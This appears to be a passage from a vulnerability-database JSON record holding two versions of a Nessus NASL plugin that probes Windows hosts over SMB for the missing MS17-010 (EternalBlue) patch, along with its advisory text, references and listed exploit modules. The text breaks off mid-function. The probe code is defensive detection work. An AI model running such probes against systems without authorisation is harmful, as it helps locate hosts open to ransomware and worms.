value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n ret = smb_sendrecv (data:packet);\n if (!ret)\n return NULL;\n\n return smb_get_error_code (data:ret);\n}\n\n\n#\n# MAIN\n#\n\n# Make sure it's Windows \nos = get_kb_item_or_exit(\"Host/OS\");\nif (\"Windows\" >!< os)\n audit(AUDIT_HOST_NOT, \"Windows\"); \n \n# Make sure SMBv1 is enabled\nif (! get_kb_item(\"SMB/SMBv1_is_supported\"))\n exit(0, \"SMB version 1 does not appear to be enabled on the remote host.\"); \n\nif (!smb_session_init(smb2:FALSE)) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nr = NetUseAdd(share:\"IPC$\");\nif (r != 1)\n{\n exit(1, 'Failed to connect to the IPC$ share anonymously.');\n}\n\nfid = 0; # Invalid FID \nsetup = raw_word (w:0x23) + raw_word (w:fid); \n\nstatus = my_smb_trans_and_x (setup: setup, transname:\"\\PIPE\\\");\nNetUseDel();\n\nif(! isnull(status))\n{\n if(status == STATUS_INVALID_HANDLE\n || status == STATUS_ACCESS_DENIED # Win 10\n )\n {\n audit(AUDIT_HOST_NOT , \"affected\"); \n }\n else if (status == STATUS_INSUFF_SERVER_RESOURCES)\n {\n port = kb_smb_transport();\n security_report_v4(port: port, severity: SECURITY_HOLE);\n }\n else\n {\n status = \"0x\" + toupper(hexstr(mkdword(status)));\n audit(AUDIT_RESP_BAD, port, \"an SMB_COM_TRANSACTION request. Status code: \" + status);\n }\n}\nelse\n{\n exit(1, \"Failed to get response status for an SMB_COM_TRANSACTION request.\"); \n}\n", "naslFamily": "Windows", "cpe": ["cpe:/o:microsoft:windows"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-03-18T01:26:56", "differentElements": ["modified", "reporter", "sourceData"], "edition": 4}, {"bulletin": {"id": "MS17-010.NASL", "hash": "53fe543478464e317e6d410772351ac0fc24836cd062b4c9d916db9c3645ff92", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)", "description": "The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.", "published": "2017-03-20T00:00:00", "modified": "2017-03-20T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97833", "reporter": "This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?8dcab5e4", "http://www.nessus.org/u?4c7e0cf3", "http://www.nessus.org/u?321523eb", "http://www.nessus.org/u?d9f569cf", "http://www.nessus.org/u?234f8ef8", "https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?68fc8eff", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?b9d9ebf9", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-10-16T07:45:32", "history": [], "viewCount": 7135, "enchantments": {"dependencies": {"modified": "2020-10-16T07:45:32", "references": [{"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SSV:92952", "SSV:92935", "SSV:92964"], "type": "seebug"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D"], "type": "attackerkb"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MYHACK58:62201786371", "MYHACK58:62201785243", "MYHACK58:62201785189", "MYHACK58:62201785331", "MYHACK58:62201785268", "MYHACK58:62201786816", "MYHACK58:62201786827"], "type": "myhack58"}, {"idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644"], "type": "fireeye"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0199", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-10-16T07:45:32", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "97833", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97833);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/15\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya) (uncredentialed check)\");\n script_summary(english:\"Checks the presence of MS17-010.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n # https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?68fc8eff\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/\");\n # https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b9d9ebf9\");\n # https://www.us-cert.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8dcab5e4\");\n # https://www.theregister.co.uk/2017/01/18/uscert_warns_admins_to_kill_smb_after_shadow_brokers_dump/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?234f8ef8\");\n # https://www.riskbasedsecurity.com/2016/08/the-shadow-brokers-lifting-the-shadows-of-the-nsas-equation-group/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4c7e0cf3\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\n\nFor unsupported Windows operating systems, e.g. Windows XP, Microsoft\nrecommends that users discontinue the use of SMBv1. SMBv1 lacks\nsecurity features that were included in later SMB versions. SMBv1 can\nbe disabled by following the vendor instructions provided in Microsoft\nKB2696547. Additionally, US-CERT recommends that users block SMB\ndirectly by blocking TCP port 445 on all network boundary devices. For\nSMB over the NetBIOS API, block TCP ports 137 / 139 and UDP ports 137\n/ 138 on all network boundary devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"smb_v1_enabled_remote.nasl\");\n script_require_keys(\"Host/OS\", \"SMB/SMBv1_is_supported\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\n\nfunction smb_get_error_code (data)\n{\n local_var header, flags2, code;\n\n # Some checks in the header first\n header = get_smb_header (smbblob:data);\n if (!header)\n return NULL;\n\n flags2 = get_header_flags2 (header:header);\n if (flags2 & SMB_FLAGS2_32BIT_STATUS)\n {\n code = get_header_nt_error_code (header:header);\n }\n else\n {\n code = get_header_dos_error_code (header:header);\n }\n\n return code;\n}\n\n\nfunction my_smb_trans_and_x (setup, transname, param, data, max_pcount, max_dcount)\n{\n local_var header, parameters, dat, packet, ret, pad1, trans, p_offset, d_offset, plen, dlen, slen, pad2, npad;\n\n npad = pad1 = pad2 = NULL;\n\n if (session_is_unicode () == 1)\n trans = cstring (string:transname);\n else\n trans = transname;\n\n header = smb_header (Command: SMB_COM_TRANSACTION,\n Status: nt_status (Status: STATUS_SUCCESS));\n\n p_offset = 32 + 1 + 28 + strlen(setup) + 2 + strlen(trans);\n\n # Unicode transname should be aligned to 2 byte \n if(session_is_unicode() == 1)\n {\n npad = crap(data:'\\x00', length: (2 - p_offset % 2) % 2);\n p_offset += strlen(npad);\n }\n\n # Parameter is aligned to 4 byte\n pad1 = crap(data:'\\x00', length: (4 - p_offset % 4) % 4);\n p_offset += strlen(pad1);\n\n # Data is aligned to 4 byte\n d_offset = p_offset + strlen (param);\n pad2 = crap(data:'\\x00', length: (4 - d_offset % 4) % 4);\n d_offset += strlen(pad2);\n\n plen = strlen(param);\n dlen = strlen(data);\n slen = strlen(setup);\n\n if(isnull(max_pcount)) max_pcount =0xffff;\n if(isnull(max_dcount)) max_dcount =0xffff;\n\n parameters = \n raw_word (w:plen) + # total parameter count\n\t raw_word (w:dlen) + # total data count\n\t raw_word (w:max_pcount) + # Max parameter count\n\t raw_word (w:max_dcount) + # Max data count\n\t raw_byte (b:0) + # Max setup count\n raw_byte (b:0) + # Reserved\n\t raw_word (w:0) + # Flags\n\t raw_dword (d:0) + # Timeout\n\t raw_word (w:0) + # Reserved\n\t raw_word (w:plen) + # Parameter count\n\t raw_word (w:p_offset) + # Parameter offset\n\t raw_word (w:dlen) + # Data count\n\t raw_word (w:d_offset) + # Data offset\n\t raw_byte (b:slen/2) + # Setup count\n\t raw_byte (b:0); # Reserved\n\n parameters += setup;\n\n parameters = smb_parameters (data:parameters);\n\n dat = npad +\n trans +\n pad1 +\n param +\n pad2 +\n data;\n\n dat = smb_data (data:dat);\n\n packet = netbios_packet (header:header, parameters:parameters, data:dat);\n\n return 